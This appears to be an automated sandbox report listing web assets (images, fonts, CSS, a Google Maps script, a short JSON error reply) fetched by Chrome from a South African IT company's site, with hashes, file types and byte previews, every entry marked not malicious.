                                                                                                                      SHA-512:4A1EB5F29E51B7BE246C2885778D727E73E9F07B02510B97A03760212DD6C4A9AFF08BC092111D2323EAB5DAE5EA3CAAA508B20FD5F2660AB5C8A1F2146F9FB7
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/nec.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d........................2................................................................................................................................................J.J......................................................................................... ..0@1..4..2!5".%......................1..3.. !.."r.AQaq....BR...#40@.2..s..CbS................... P..@.!0.a..................... !1Aa.Qq.0@..............................................................................................................................................................................................................................................................................S.H...x...s.....<....IW.."...1....<.Nm...P.E......kK..5...R).x..2.<.....P...6.F..'..W._..5...M.....=}& Y|.$.Y...Nvj/.2.m.c..|.%>9...x....y..0..:.c.K.V....cZ<....<..9....b...._......J......Y.........~...:...i....>...LkG....'.y.>.z.L@.y....-.../g8o..............m..'.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):10324
                                                                                                                      Entropy (8bit):7.693451400674088
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:yrTvkR5REGtGrqPexIf+X+ezJBcQFUCQbNZk/JlpQ1SJ31lcV+cw:YkR5WxIfJqcQFH4khlpQ1S7l4+/
                                                                                                                      MD5:D5B5A462C3D6A2E593EAB089D5E9EB69
                                                                                                                      SHA1:EAAEC24E5E0E8BEFBC1683F51790F4124635026B
                                                                                                                      SHA-256:52D1DE4BA1E7DFE5D1947665FBF8AC5B89F78C3011EA0B5707496806345EAE31
                                                                                                                      SHA-512:C30613258FB88F6A1FC33AA3F41EFB56F6AEEE62A91393F15BBABEA38C0374F4FB8563C30F363DB05C15912D11B6B5778F7DCCD591FCEC7AB822E3ED62409B92
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/cisco.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d....................F......(R............................................................................................................................................J.J........................................................................................1240@.. .!3`.."$.......................!1..rAQaq.."2R0@...# .B.3..b`.................... ..!.@P1.a0`pA....................1.!AQ.aq.. @..0....`...................................................................................................................................................................................................................rl..@....sg...V..........+3j....N.....(.t^Ya}...........+......>.....(.>^.~..@.........(..Wz..lvV'UU.Uj.}P....t.K......>..W|(.>^.~..E"....KL.......-.3+._J..4.N..N..(...\s}..]./...]}..Y....../.]../...m........%...i..,x.h..}*....&.:..:.P..uq...v...y.\.W....2`%..m(u...Q.(|...U........!..l.C...i.OO2....../`.am....2....
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1389
                                                                                                                      Entropy (8bit):7.770462221513277
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:QK25bniv6dGNtrUKmNXsO0lPXBuDs9iOSxRMsba0yfQ242XWefeDuOteXFYv:QK2Niv6dGNZUFNXsfirNyIBDfteVy
                                                                                                                      MD5:5E475EADC46BBF234A7C5869A1AEEFC8
                                                                                                                      SHA1:7212BA3D9846FE9A5F729668A2B26A02A03FB318
                                                                                                                      SHA-256:97AEC3CDB1FB31BFF229298BC4BAFF4EF1612465621467B41C97B50FAB261529
                                                                                                                      SHA-512:F4574E4179CFBE2B2BC531242D9B9F63009739C7BB237FFB020D24B7730BA7B961CFF03214801165BAD8A8C5689C227E193E37791B357DD9D44776968443A715
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR... ... .....szz....4IDATX..ilTU........3].p..*. .L...D.`.....4jjA....MP...u0m..6.D.'G....P!..jL...C..tJ..Nm...[..-.N..m.I&y..}...Y..\...4..a.t.P......!.N....H.i....e.......;.*...... ......,!.).n...34...$.<.C.A`...X.%..V3....&.m@?%...{.#vt...AS}l2)..~.2...=..`.....J..@.+.t`'....k.s.P..M...(....+..).!`^.T.......R....!.7.&.......3w....(.B...x.vX.0.W..@.......`<.0=........$..........{..W{.Fdt....F{..3....b?....d:'..W]..>.6.J....%j.....,.f.$...\?.?..j^.=.X8)....'..."`..fm...k..^.\.[..0...D{j.>iC..ORo.p..q...k.....7..o.4....m.......8G....c....1..-k$y...k...$.!......W...BJ..8G ........U`l..#...$..1..t^.l....#.......',R.....".i?.8.>0.%.S....b_uM....@.....f."......@...Y.;oUe.$...$.. W.\."D..$r.&.XM..v..[...."..VU...4.h.....[..K=;b......QU.izKT....*..U_.B.8.........1?...U...e5+J.U.fVJ....2&..W.?K.....~....~.,.C...z.'2..qRh.'.7..oU.<.3F!).y,.{q.{.X....K[..}@.....M...#"...Z.f.`m..9r(.[k.......0.._...?..'..(..s."..2.MYdN..L`k.m.-../...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):12018
                                                                                                                      Entropy (8bit):7.7700105163252
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:Ky+ByAnyhf8C23QizR+Z79ZBv1wVjZKLVA8v7tWiWpzlYn3sJ58ZtlWY8kqGeF7y:jAnGwNzRqrwVjZK57v55WpzlSGt7y
                                                                                                                      MD5:A28974449C7C78C4950C0956528974F6
                                                                                                                      SHA1:E606949AAA154DCC5A0EEE3E9E31F10A87A2DDDD
                                                                                                                      SHA-256:1B20431761B8E5B517DB1F7DC0A8F6E5316F7E2A82E39ACA1B13141323E15C6A
                                                                                                                      SHA-512:04A3F18A8832A921DC106E224996BDB7D8787D90354DAF68E937336C24D82714D0E97AD329825006B63591DF93DEA96833DD894A3F51056662B1D3DAC502AEB9
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/petrosa.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.......................".................................................................................................................................................J.J..........................................................................................@.1 .2..4.P!5."3.0`.......................!1.. AQq.."r.@a....2BR.#s..b..3S4P...C0`.$c.................... P...!1a@`..pQ.....................1!. AQaq.@...P...0...`....................................................................................................................................D<..s/.<.x6.... ..U............zUF......tZ.?v:.O.g..%.............%(A........t.w...{]F..r.,.$.vDY.............`....f.l..-.9....m......%..E..B............N..u.yM........[..].H;,Zm.KjoF..5....d..............a...7^.>.mU.....xz-.}.....o}.....{...[.[7.........+.....u.....ZP..g......m..W3]....5d...Ie.............~..n.h.....{<=..>.......4...`]..Q".>...........&..~..n.h.....{<=..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (39474), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):39474
                                                                                                                      Entropy (8bit):4.958670028110924
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:6hrWnqprwYDl+BcyVwu3/AQFPwavj3gEcgFK7r2vmN8Cagg:oColvCVASP58ab
                                                                                                                      MD5:B798BD5BD028D3032655AFAD3BA2E1EB
                                                                                                                      SHA1:B5AEDFC44BFE8217A996687C00D4EA9672B6FD46
                                                                                                                      SHA-256:2902B27F8EAD8CB1E0EA0426993CA56B5F966E47F6A2ABC73635489589B968CD
                                                                                                                      SHA-512:1289C5D7CBBFCF9BDC7D0571BF1B91662AEB0239F41257473AE5169FBEE5BE4370D483211D86B35FC03539207102B4A78377FC69E9F00DB25CB1B3960C1B8DA5
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/responsive.css?ver=15.0.6
                                                                                                                      Preview:@media only screen and (min-width:1300px){.container,.post-area.standard-minimal.full-width-content .post .inner-wrap{max-width:1100px}}@media only screen and (min-width:1000px) and (max-width:1300px){#author-bio #author-info{width:544px}#project-meta ul li .nectar-love-wrap.fadein{margin-right:11px;padding-right:11px}#page-header-bg .span_6 .subheader{font-size:24px}#boxed .nectar-slider-wrap[data-full-width=false] .swiper-slide .content h2,.nectar-slider-wrap[data-full-width=false] .swiper-slide .content h2{font-size:32px;line-height:50px}body .swiper-slide .content p{font-size:20px;line-height:34px}.nectar-slider-wrap[data-full-width=false] .swiper-slide .content p{font-size:14px;line-height:24px}.portfolio-items:not(.carousel) .col .work-item.style-2 i{line-height:32px;height:32px;width:32px;font-size:14px}#top nav>ul>li>a{padding-left:8px}.sf-sub-indicator{left:6px}.nectar-slider-wrap[data-full-width=false] .swiper-slide .content p.transparent-bg span,body .swiper-slide .content p
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):9298
                                                                                                                      Entropy (8bit):7.9550983829848825
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:z7EAh+ASL9ww3b15OVc2cq1o0QZQUs4J0dLjN4kMMXL:HlS9wQp+7t1o0Avs/dLB4+L
                                                                                                                      MD5:9182BAEEF0717A153E9A5BA8F8D1F262
                                                                                                                      SHA1:73EC57D617560E5382E0B1224132A58560ABFE7C
                                                                                                                      SHA-256:DEFEFC073CEA8BFEC290D2B541D44C873DA961CBB3F6A5F91C9C940F21C45F1D
                                                                                                                      SHA-512:40FF64D90FF8C63323ED71FF68483036591F746AEC8A974B6778D512291DDB8B4D95C7F3F5F5093CD209D7DB52FF9D546C43B0188558F1F382EDF60E82374CB1
                                                                                                                      Malicious:false
                                                                                                                      URL:https://logo.clearbit.com/itnaledi.co.za
                                                                                                                      Preview:.PNG........IHDR.............L\....$.IDATx..}..]Uu.Zk.s...........C......"8.*j..[..Z..j...V.Z....... *" ...)$...@.H s.p.s..k....//...._.].U...{.^.5.w..@..G....uj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..dj..d...0T.R.l.{..._._.....7..>O.K.,W...C.R.k*"..:...@.N...7......h`.F ....... `v.4.d.1.c.A0.\w..&.......q.....:.~...1......9...P. V.`MC. ............`j`b...Q..@....l..3.~...b...&$!.dK../....J 0....AC...A."..!...B......?...v/.N..=K....0.aQ...q.j`!`...9....t...QyF{.o..)`P.......`.&...........T..`@.9...Vq.i.^..w<.z5..%,@.)k...P.-....Q...d.).2..v..]..7.-X..+Ub....I..co.vr.=.l...]d......LU.9ht.M.2a.y.r5..hD....'x.J....d....3....D.C..o][...E...W...Y*.........r.(.J!......py..RP+Ua8......>s..X.b+J...$.d.Y.".{.d.. g...n&.(EJ.>}..?.......LK..2$..k..2.(1q.........)....4b"l..k......J+....7.r.7n.......a....,.rD...!.([j..gz.^..*AO....MI,......H.....m.;... . (.l.....;.`."...._..sW.0Y~..u..q.P..4..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8925
                                                                                                                      Entropy (8bit):7.596661108432522
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:WNLFpIJV9RqckUH44HhoBZq+M2H8BNdLFF1cr5BvJOiN/42v:kjID9aUHtHWzH8BbL6r5dJ2G
                                                                                                                      MD5:ECBDDDE84F30DC9BA40E311D84C2BCA7
                                                                                                                      SHA1:5A7A93E99556DFBADA8C1545A5F857E0AE29EBA3
                                                                                                                      SHA-256:9017B397156155CB238721EEBF535A363C7A00D30EDB31C628BCA6F5778CD4D5
                                                                                                                      SHA-512:773CB7406D9C3FD33C55DCB40F19D6EE5197DAD80BFC9A884E24E3873848DB519A59E7EFD2B86B507BA8B9EA0FB9FBA57D68B8FC5636CFBA59553F48211ED26E
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d...........................".............................................................................................................................................J.J.......................................................................................... P0@...5..!1234.6......................!1A...q"2.Qa......R#3 0.Bbr..sP...S.4.......................P..!1. .a0@.q"....................!1.AQaq P......0.@.................................................................................................................................................................................................................................................>..,...................!.:...,w......M..............+Z..-....Z.gOK:...$.(me...............z..|.S..H.8\w..Y.,.V..N......<...*.."..#.O.@..>...a......s......).....'.Ri..."..Q...A&.FC1..3.x,2.'DP.....^.j.>...Y...KOV3.....].{...}m.{.d.|.bodE..9.2-3..e..R.N#.m..,c.E.T....]......LL...QM._.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):8198
                                                                                                                      Entropy (8bit):7.545002380293291
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:bToo2XKLGpWb5cMIJtM/rl6mOCZB0jq7/XyHafHfEC/9JQlB8sb9nA6SR1ISQp:b0vFWtctcJqq2q7feafLzeBbAx1gp
                                                                                                                      MD5:5162BB80799DED633538BE2BCDB6A96D
                                                                                                                      SHA1:F3D512E7831EF6F16CD5A9A5A53C8D58D36DB2F4
                                                                                                                      SHA-256:B574699E5AEA93AA323F5629570CBB3079CC3025E9E2E1C1BE9779CBEAEEFC3D
                                                                                                                      SHA-512:77F5B2AECFADE2E27A80D8DDB7AA53C648B09A0997A5F9F3C3D862C85FA7489AC01471B508AEEFEFED76E4D9AE3B1E8DFC91A89E51CCF01FD4CDFACEC33D44E6
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/BYTES.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d........................... .............................................................................................................................................J.J.......................................................................................... P1..0@.!2.4#$.5."3......................!.1AQ"..aq...2.0..BRr#3 P.....b.@..C..................P...`.!1 .aA....................!1.AQa Pq..0....@................................................................................................................................................................................................................................................................................F..1...S.{..d....@....................#..UZ.m.....>..N.{.....L...b@..7.....d.Y........M......W.k.[.^..z[3K...*k,9k.-uS..9.5.l."@.......d....7..h} ...O.k.~.C..<{..FMl....-Mf...0...%..M'K[V...V...v....+nw.qp..{?7..........U../.G..c..=Me.,>.eEQW.....
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5910
                                                                                                                      Entropy (8bit):7.209639903547972
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:4W3F7i+Dfmhc9HEiZp4ZxDYujHW/kcGBfRKlCVQNz8i/KuyKczAWyN:4WwafmhskijcDM8LEbN1CuOq
                                                                                                                      MD5:AB403A2A1636BACF7FF01137B2661C68
                                                                                                                      SHA1:BAE0C70537E145E95A889C95D83DAD3498D98090
                                                                                                                      SHA-256:784A8E168C607E45D303D4828A58350DD6F37E79304E9BB91FB196D0911629E0
                                                                                                                      SHA-512:0E82B3993F0E0A79E3FC4F30A6E207C158667FD144D190BD700A85C59AC0120CDBC343807C4CC91505273ED3F0E07FBB1AD26A04BD56619BEA66F533C0A1A433
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.........................................................................................................................................................................J.J........................................................................................120P.!"B.3.4.5@C #.%......................!1Q.Aaq."....2r30P...#..@..BR...S...................@.!.0. .....................!1.AQaq.0..@P... ..........................................................................................................................................................................................................................................................................................0`...................a6p.............. ....._F~........."..0. .. .K.....v... ....Y...<.du...y..v...s.U.ts.r..-.R..........&z...4..-l.;4..u)Z8.&...>..Y......Z.m~...v..j....KJ...|........."+.3.....3G.......<;5M.^.7o.....r.|.[..j............./a..^+......U[.}.^.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 19292, version 1.0
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):19292
                                                                                                                      Entropy (8bit):7.987882260000338
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:4ZrG6CxmxB9ugiwiqU2FDLhoLFkAspOKRc1r6A7S1Fpuu75URjwNybeLPC:4ZXAgiwipKAGOKecY4eFwWUPC
                                                                                                                      MD5:19007B17E56DAA60133BCE9E9B352A95
                                                                                                                      SHA1:BAC1384CAEAE5762E7A1D8C18037F69C8CD21BC4
                                                                                                                      SHA-256:FD88A03358BA14440B78C6329717BDF6ED1A9FE97C3AD4E0A0A39D31FB1AC546
                                                                                                                      SHA-512:81323F3EE4126F5045D4E4FFEBC50633E571FE988EA790F46391F30B4CCF0C6F73595D3CD4585B2BB333FCE8A80CF229A60CB53A425E6CFD34A1C50C2D42CDC2
                                                                                                                      Malicious:false
                                                                                                                      URL:https://fonts.gstatic.com/s/questrial/v18/QdVUSTchPBm7nuUeVf70viFl.woff2
                                                                                                                      Preview:wOF2......K\..........J...........................:..&....`..P..:........x..w..J..6.$.... ..,.....a...'..v.(w.B .g^.r......ZBU.........d...ZR.c...@U.,..("...T........l...zkh~hC:\\..Lc'!.o..D .p....F...oSF+.+.}^.k.x .A...]......e...S....``Z:..eS......}.<K......k......<cg.Q...c.p.".p...Vo...F..FsL^.Xx......S/....Sk...}.....J.F6t.p.$md...(...N.BV........~.=.@.....dJ..=^.4.1.Q3.Q..."7....}......p...S....d#7O.....Y..be.WL.P..:...6J.Y&Y..........{...........e.....e....."~.rV..@.^dl....c.k...p...6...01o+.T.B.0^......J....|.3.0T.'U.......l %...*..*....).[.0g..mI_.s./|..s...^..,.p...p....U..K......Nu...w..........GO.3......5L/.?...X.k:a.Oqy....\h.o...t.Wt./..ki"w.s..l...Bf....zQ....{.#..........o.Q.(.;...0k..'.......5.Z9.T4..X.....#qjZ...""3?H.C.5\.Z..j.......~:...1....M.........H;.Q.,_.HT....+.+......bA...(..D..d.p....B$....x9:..p`p`p...R....n\^U^S.......*^...FF..fS..Q.4.'...X*EQ....yjo.,.....r.#Y....oR.^m....../.Zc)?.jj.HBV..~mT...EX....A].........?6.h....E.H
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Web Open Font Format, TrueType, length 98024, version 4.7
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):98024
                                                                                                                      Entropy (8bit):7.996821929003623
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:Te9lM9ITKMpPtandzpLwETpNfdFj2yExmni83X3t4MCWzSBE2RM5RgUAkzm7zl+b:VWKQta9pBNT1n3X3BnmBI5Wx7zlvKfF
                                                                                                                      MD5:FEE66E712A8A08EEF5805A46892932AD
                                                                                                                      SHA1:28B782240B3E76DB824E12C02754A9731A167527
                                                                                                                      SHA-256:BA0C59DEB5450F5CB41B3F93609EE2D0D995415877DDFA223E8A8A7533474F07
                                                                                                                      SHA-512:9C776DEA55A01FD854EA23B3463D9AC716077D406ECBE8ED0C9B6120FF7E60357F0521AB3E3BF9D4E17CA2C44A5D63EE58A4E7A37A3D3F26415A98D11C99E04F
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/fonts/fontawesome-webfont.woff?v=4.2
                                                                                                                      Preview:wOFF......~.................................FFTM...0........k.G.GDEF...L....... ....OS/2...l...>...`.2z@cmap.......i......:.gasp................glyf... .._y..L....Mhead..b....3...6...-hhea..b........$....hmtx..b.........Ey..loca..e............\maxp..l........ .,..name..m....D......post..o`.......u.............=.......O<0.....1h.x.c`d``..b...`b`d`d:.$Y.<.......x.c`f.d........b.................b......l...|6.F.0#....F....n..x...J.q...gje..>."..D...>..{.E.O >........,".u.^..[[[...j.os..._.M..%:0g80..........B...L.s.z.. 1Y..lKWv..es.t..)Mk^.Z...m......b.k..2....6...>'.Y......jukZ..g..m2. ......(.4..-iEk..v..}..X.B...Y`....`.....c..9.Z.JV..5.e..Y.6.G...`3..|.6.....[uI.p.n.-.....[p.L...0...Lp.;.....%....8.o...>F8.....G8...`..W........".E^.._.=(.K,F.K.+.y..b..............x.....T.0..o.}{.uuuwUW..n.njmz-..nv....E.EAA..J!*..(..hD.2c..%F...Eb.b6...$&.....7.....UUW7.....t.w...{.9...8.m.8b...I.............7..S.E..G.!.3.....j..=.w;.P.^I..A;RR.n...k..LS....).o8G.([.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):10417
                                                                                                                      Entropy (8bit):7.70757597380674
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:4utmkHKdhuiNuGn6Y6Z4jRI4O9jZKWLzLjg+yyS3fVyj24QAX:HKvunGn6n4FIt9jZKWHLjEJf8y4Qw
                                                                                                                      MD5:98F9FA0C28DDB741258F858D3B9D2C3A
                                                                                                                      SHA1:877FEA4CF0A7CC4A467EA392937CFD6CCFAC9E2E
                                                                                                                      SHA-256:BADC4C4BA4C30C01421A1424D64E0FEC17E5362B28C185164CDDA5431473F42E
                                                                                                                      SHA-512:2587AE8B4D630164D468B5020307722B6471CE57D6B38C670CDBA70FC22995EE419806CFAD127207A19292A7794D0DEB9BCCE58DD618D02912841C6F69C84BD8
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/building-industry.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d....................2......(.............................................................................................................................................J.J..........................................................................................!1. 0@.P.2.`A"B%534D.......................!.21.".3AQa..0@..B#.q.....r$ .Rbs4t..................... 0.!Q@..1.....................!1.AQaq... 0@.....`P.................................................................................................................................................................................................................................i.V{....7....j..U.:.H..5..w..]~|.........Y...Vn..)...b...w./'=.M.mkn. *......W........../...NoE..z...... ..q&.c\...x>.............._...^j.@C5C=..\l..4Z.I5.]y..z..o.\.......>................iN.k/;=.Q..j.B.zV.:o........=?.|z....'..x..~..7.-.....0y.~.y.O=+.*M.s.@....5.5...X.}......'?f.....}.........@
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (908)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3103
                                                                                                                      Entropy (8bit):5.5112815595215565
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:fBwSdKZ1gIeNeHDfR5DxlAHfZoCwl/CIdBsGC:BdSheNAfR5DvufW5l6YBsz
                                                                                                                      MD5:C63C0DDFFBA277852ADA40926474C3E4
                                                                                                                      SHA1:95E41B414CD9D13D16FC3866E0029DC3BA9B35D9
                                                                                                                      SHA-256:9180194A22DE17985744024437891C1E7D5E972CC0BB557E77B4D377265668A9
                                                                                                                      SHA-512:EC4891BAACDD35385943B04E95D1A3A48EEB65FD3C4E604962A41E0BDD85514FA4969B70BD2A7FD132B075BC217E3FDF1F4B05ED9F9D235E961BBF0FB81C2837
                                                                                                                      Malicious:false
                                                                                                                      Preview:google.maps.__gjsload__('geometry', function(_){var Zpa=function(a,b){return Math.abs(_.vj(b-a,-180,180))},$pa=function(a,b,c,d,e){if(!d){c=Zpa(a.lng(),c)/Zpa(a.lng(),b.lng());if(!e)return e=Math.sin(_.Xi(a.lat())),e=Math.log((1+e)/(1-e))/2,b=Math.sin(_.Xi(b.lat())),_.Yi(2*Math.atan(Math.exp(e+c*(Math.log((1+b)/(1-b))/2-e)))-Math.PI/2);a=e.fromLatLngToPoint(a);b=e.fromLatLngToPoint(b);return e.fromPointToLatLng(new _.vl(a.x+c*(b.x-a.x),a.y+c*(b.y-a.y))).lat()}e=_.Xi(a.lat());a=_.Xi(a.lng());d=_.Xi(b.lat());b=_.Xi(b.lng());c=_.Xi(c);return _.vj(_.Yi(Math.atan2(Math.sin(e)*.Math.cos(d)*Math.sin(c-b)-Math.sin(d)*Math.cos(e)*Math.sin(c-a),Math.cos(e)*Math.cos(d)*Math.sin(a-b))),-90,90)},aqa=function(a,b){a=new _.ek(a,!1);b=new _.ek(b,!1);return a.equals(b)},bqa=function(a,b,c){a=_.ik(a);c=c||1E-9;const d=_.vj(a.lng(),-180,180),e=b instanceof _.Mn,f=!!b.get("geodesic"),g=b.get("latLngs");b=b.get("map");b=!f&&b?b.getProjection():null;for(let t=0,u=g.getLength();t<u;++t){const w=g.getAt(t),x=
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JSON data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):80
                                                                                                                      Entropy (8bit):4.519265602280304
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:YKOHcWnyKBAHfXHyUNskUQ9WeUAdRNn:YKOHnyaiftOkUgzTN
                                                                                                                      MD5:3FA187421B5A45709B21C348556B4A6A
                                                                                                                      SHA1:F44809B9AAA680AE2BD9952DEEE31F85FED9FFB1
                                                                                                                      SHA-256:BADDE82FD2CA7C7B153EC29AAABD4E9A370A953FF2C0591DFB19B4521D4AE518
                                                                                                                      SHA-512:7C738A42C954A55E718266CA0868870E6F87E9676298E1A488F14DFC546FC5E69EAA3069CA452C9AA6DAA2B7EC431FF51A82566A2EDD177C1180E9631802A6C2
                                                                                                                      Malicious:false
                                                                                                                      Preview:{"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 533x227, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):22522
                                                                                                                      Entropy (8bit):7.974462327792532
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:jBmIrcMJbTXrOe9xnTv6yG2qEdOJgKN9rwyQ9JXo0sikXNrH:dPTNzrHnGyl6NFwy4Pz4H
                                                                                                                      MD5:00FE7051B26FE2E6E5884EFF6FC02C38
                                                                                                                      SHA1:6ADEA777FDCA62124F089880847D2402DCFDFA8C
                                                                                                                      SHA-256:DEE48CCD2310BF97D262FF0DAE812C7875CAADFCCDDA92EB85D840DDFDBAE835
                                                                                                                      SHA-512:015DBE5C9F52802B8A1CF816708AA1E99796CF71E21A5D32085B960E541C2EB488E93EB22CAAFA82BE50294DDBD835046E135F3210E6D86253BBD70B8972D000
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/image-1.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................t..##..8o..W....................................................................................................................................................................................................................................... ..!10P"2.@A3.B#.$4.5.....................!..1A. Qa20@q...."BR..P.C..br.3...#.S4........................!....................!1. AQaq.0...@....P....................6.....". ...!.4..$hp...Q......."....,...m.:..M..+.{(.^.2..u.^...../Ng..<..8.X..4..g...(..:.9R..H.....AD.!.<......]..sG.(.s^K..Sv..Rn..y....s./x..YU...o..!..D.]1W.l...=..|.D\d.K.b.+..........H...N.AD.!.<.....ju..3[.(......=..W..O..Y.....c.#x..H. cU\...}'.WNb......x...a.~].gE..".......b..X.W.p....... ...B. ..$.!L......i.2~.}...Q.s..]M.....C..#Y>.'x..t<;....eo.2.Y...^;.7.....KNvDh5....c.,A.....8@.(}U..A.8.R.A..........Y..l-..)..S..N........i....V...eo....e9v.....~mj...~P}^;..k.'..y=...-."..4
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (24778), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):24778
                                                                                                                      Entropy (8bit):4.949269475583849
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:vRe56M1xBS50PLZlVsVG4mRJGojXLJTxg8LQ58MDt:vRe56M1xYePLZlVsVG4mRJGojXNTM
                                                                                                                      MD5:0E1C1557A6C99CAA01A3EFE9D5A589B4
                                                                                                                      SHA1:F888527B741251CB4BA1F4436F265510B60D316E
                                                                                                                      SHA-256:46EF0FCBAF594EE81C04EE892757C23C3234D363132AC1A67E1C6C0ED0AF4BB4
                                                                                                                      SHA-512:FB2523953179F4612AA457AE2AEDA2A77921CB2F3DD1C60253E50C2A657EF26223E2308520230118CD983F1499EC62311754390B3E9CD4C75062C4ECDC7FEF76
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/style-non-critical.css?ver=15.0.6
